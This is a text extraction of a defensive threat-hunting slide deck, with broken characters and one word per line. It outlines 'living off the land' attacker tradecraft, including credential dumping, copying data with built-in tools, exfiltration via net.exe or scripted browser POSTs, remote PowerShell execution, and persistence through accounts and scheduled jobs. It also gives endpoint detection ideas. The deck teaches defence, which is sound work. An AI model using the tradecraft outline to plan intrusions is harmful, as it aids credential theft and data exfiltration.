2. Background
Threat
Landscape
Advanced
Threats
• What
are
they?
• Zero-‐Days
• Why
Advanced
Threats
might
not
be
what
you
think
they
are
• Living
off
the
Land
(“Outsider-‐Insider”)
Hun/ng
• What
do
you
hunt?
• How
do
you
hunt?
• RelaQonships
MaTer!
Wrap-‐Up
&
Takeaways
Agenda
4. The
Evolving
Threat
Landscape
Criminal
Enterprises
• Broad-‐based
and
targeted
aTacks
• Financially
moQvated
• Geang
more
sophisQcated
Hac/vists
• Targeted
and
destrucQve
aTacks
• Unpredictable
moQvaQons
• Generally
less
sophisQcated
Na/on-‐States
• Targeted
and
mulQ-‐stage
aTacks
• MoQvated
by
informaQon
and
IP
• Highly
sophisQcated,
limitless
resources
8. Opportunis=c threats sell our computers.
Goal: breadth of access.
“Advanced” threats sell our data.
Goal: precision of access.
9. Tradi/onal
Defenses
Were
Designed
for
Opp.
AZacks
OPPORTUNISTIC
ADVANCED
Goal
for
aTacker
is
to
compromise
as
few
endpoints
as
possible
Goal
for
aTacker
is
to
compromise
as
many
endpoints
as
possible
Hosts
Compromised
Time
Hosts
Compromised
Time
DETECTION
THRESHOLD
DETECTION
THRESHOLD
Signature
available
Signature
available
(if
ever)
10. “Zero-‐Days”
“Zero-‐Day”
is
a
term
typically
used
to
refer
to
two
different
scenarios:
• Zero-‐Day
Vulnerability:
vulnerability
is
unknown
or
fix/patch
is
not
yet
available
– “Non-‐Pub”:
exploit
an
unknown
vulnerability
• Zero-‐Day
Malware:
malware
that
is
unknown;
signatures
are
not
available
13. But
once
they’re
in…
However
they
get
in,
we
need
to
find
them!
Faster
detec/on
means:
• Shorter
dwell
Qme
• Smaller
scope
for
your
incident
response
• Less
damage
to
your
business
What
do
they
do
once
they’re
in?
15. Living
off
the
Land
Living
Off
the
Land:
the
aZacker
uses
built-‐in
tools
so
there
are
very
few
new
executables.
The
aZacker
typically
needs
to
do
the
following:
• Execute
code:
– Crack/Dump/Guess/Obtain
Valid
CredenQals
» See
this
with
Backoff
POS
Malware
• Copy
Data:
– UQlize
tools
like
robocopy,
xcopy,
cmd.exe
to
gather
data
– UQlize
“known
good”
tools
for
compression
or
use
scripts
• Exfil
Data:
– mp.exe,
net.exe,
Visual
Basic
script
to
control
IE
for
POSTing
data
• Manipulate:
– Download
something
not
malicious
but
that
will
trip
up
detecQon
– When
Admin
logs
in,
credenQals,
keystrokes,
etc.,
are
captured
and
used
• Persist:
– Compromise
or
Add
more
user
and
system
accounts
– Login
to
backup
servers,
staging
servers,
less
noQceable
parts
of
your
enterprise
– Create
scheduled
jobs
that
will
run
and
re-‐add
accounts,
communicate
out,
etc.
16. Living
off
the
Land
(cont’d)
More
Things
to
Consider:
• PowerShell
is
TOO
Powerful
– Execute
from
remote
URL
– Basically
anything
you
would
ever
want
to
write
code
for,
you
can
do
with
powershell,
so
as
an
adversary,
I
can
really
do
some
damage
(powersploit,
etc)
• Use
Internal
C2
Sites:
– Use
blog
comments
and/or
wiki
to
give
your
stuff
new
commands
so
there
is
no
outside
communicaQons
• Use
Well-‐Known
Social
Networking
and
File-‐sharing
Sites:
– TwiTer
(bots)
– Dropbox
– Google
Drive
– Facebook
– <
Insert
Social
Site
Here
>
• Find
hardcoded
creden/als,
re-‐use
same
password
across
an
enterprise,
Single-‐Sign-‐
On
design
flaws,
etc.
17. In
Other
Words…
THEY
ARE
NOW
INSIDERS!
BETTER
DEFENSE
AGAINST
THIS…
LEADS
TO
BETTER
DEFENSE
AGAINST
TRUE
INSIDERS!
21. What
do
you
Hunt?
Do
you
know
what
you’re
looking
for?
Do
they
have
to
be
advanced?
• Are
you
running
vulnerable
somware?
Is
it
likely
to
be
compromised?
• Have
you
hardened
your
systems,
have
you
reduced
surface
area?
• Do
you
have
shared
passwords,
plain-‐text
credenQals,
etc?
• If
you
have
too
much
entropy
or
very
few
standards,
hunQng
will
be
DIFFICULT
• Then
again,
it
is
rarely
“easy”
What
do
the
bad
guys
need
to
do?
• Execute
• Communicate
• Grab
Data
• Steal/Add
CredenQals
• Persist
22. Which comes first…
Detection or Collection?
By priori=zing collec=on over detec=on you can:
(1) HUNT MORE EFFECTIVELY!!!
(2) Rapidly find root cause
(3) Quickly & confidently reconstruct =melines
(4) Accelerate Discovery (determine scope)
(5) Benefit from hindsight (evolve)
23. Some
Ideas…
§ Are
abnormal
user
accounts
being
used?
§ Do
windows
processes
(lsass,
svchost,
csrss)
have
strange
parents?
§ Are
IE,
Acrobat,
Word,
Notepad,
etc.,
spawning
child
processes?
§ Are
Office
Applica/ons
making
outbound
connec/ons?
§ Is
Java
spawning
command
shells?
§ Is
cmd.exe
running
as
system?
§ Are
user
accounts
being
added
locally?
§ Are
thousands
of
files
being
modified
by
a
single
process?
§ Is
bp
or
robocopy
being
used?
§ Are
processes
execu/ng
that
don’t
have
a
.exe
or
.scr
extension?
24. Back
to
the
Basics…
§ Are
you
recording
every
command
line
used
by
net.exe
and
looking
for
abnormali/es?
§ Are
you
watching
when
PowerShell.exe
is
used?
§ Are
you
mapping
user
account
ac/vity
to
hosts
to
look
for
abnormal
logins?
§ Are
you
….
<INSERT
LOTS
OF
STUFF
“TO
DO”
HERE>
25. “Response
is
the
closest
thing
we
have
in
IT
to
dogfigh/ng”
-‐
Bruce
Schneier,
Blackhat
2014
Keynote
26. Time is the dominant
parameter. The pilot
who goes through
the OODA cycle in the
shortest time prevails
because his
opponent is caught
responding to
situations that have
already changed.
Col John Boyd
1966
Observe
Orient
Decide
Act
27. Modern
IR
view
Ac/onable
Endpoint
Visibility
Tradi/onal
IR
view
Events
+
Intelligence
With
no
insight
into
known
bad,
how
can
they
pick
the
needles
out
of
their
data
collecQon
haystack?
Events
+
Intelligence
+
Prevalence
Without
understanding
prevalence,
how
can
they
prioriQze
detecQon
events
to
accelerate
threat
discovery?
Events
+
Intelligence
+
Prevalence
+
Rela/onships
Without
maintaining
the
recorded
relaQonships,
how
do
they
quickly
scope
any
impacted
endpoints
and
lateral
movement?
Events
Most
organizaQons
only
have
a
staQc
view
of
their
business
and
the
data
they
manage
to
collect
What’s
more
ac/onable?
?
svchost.exe
ran
svchost.exe
was
spawned
by
unsigned
binary
under
abnormal
user
account
and
made
a
network
connecQon
28. The
very
nature
of
threat
hun%ng
requires
the
human
element
In
IT,
we
hire
staff
to
support
technology
In
security
opera%ons,
we
buy
technology
to
support
staff
Invest
in
tools
that
enable
humans
to
make
quick
decisions
29. 1
2
3
Hun/ng
Tips
Collect
the
RIGHT
Data
Neslow
data
and
firewall
logs
can
help,
but
if
you
aren’t
seeing
what
is
execuQng
and
what
is
changing
on
your
systems,
you
will
not
have
as
much
hunQng
success.
You
need
to
hunt
where
the
adversaries
live!
Incorporate
Reputa/on
and
Classifica/on
Informa/on
When
you’re
hunQng,
you
should
not
have
to
spend
Qme
manually
checking
the
reputaQon
of
a
binary
or
website,
as
that
greatly
slows
down
your
ability
to
conQnue
to
the
hunt.
Being
able
to
quickly
say
things
are
known
good,
known
Bad
is
key,
as
is
the
ability
to
say
if
it
is
part
of
a
parQcular
campaign
or
aTack.
Analyze
RELATIONSHIPS
RelaQonships
are
key
to
being
able
to
detect
abnormal
behavior.
Sure,
the
adversary
lives
off
the
land,
but
they’re
sQll
going
to
do
unusual
things
with
the
exisQng
tools
available
to
them.
4
Automate
as
much
as
possible!
When
you
know
what
is
normal,
you
should
be
able
to
be
alerted
when
acQvity
occurs
outside
of
what
is
normal.
And
you
should
be
able
to
automate
this.
You
should
also
automate
reputaQon
and
classificaQon
informaQon
retrieval,
and
automate
discovery.
31. Take-‐Aways
Think
about
how
you
might
hunt
advanced
threats
Can
internal
tools
be
used
against
you?
Do
you
have
proper
context?
Can
you
tell
the
FBI
whether
or
not
you’ve
seen
the
IOCs
they
just
sent
you?
Compare
current
behavior
vs.
older
methods
vs.
“next-‐
gen”
Enable
your
humans
to
do
some
hunQng
Are
you
focused
on
root
cause?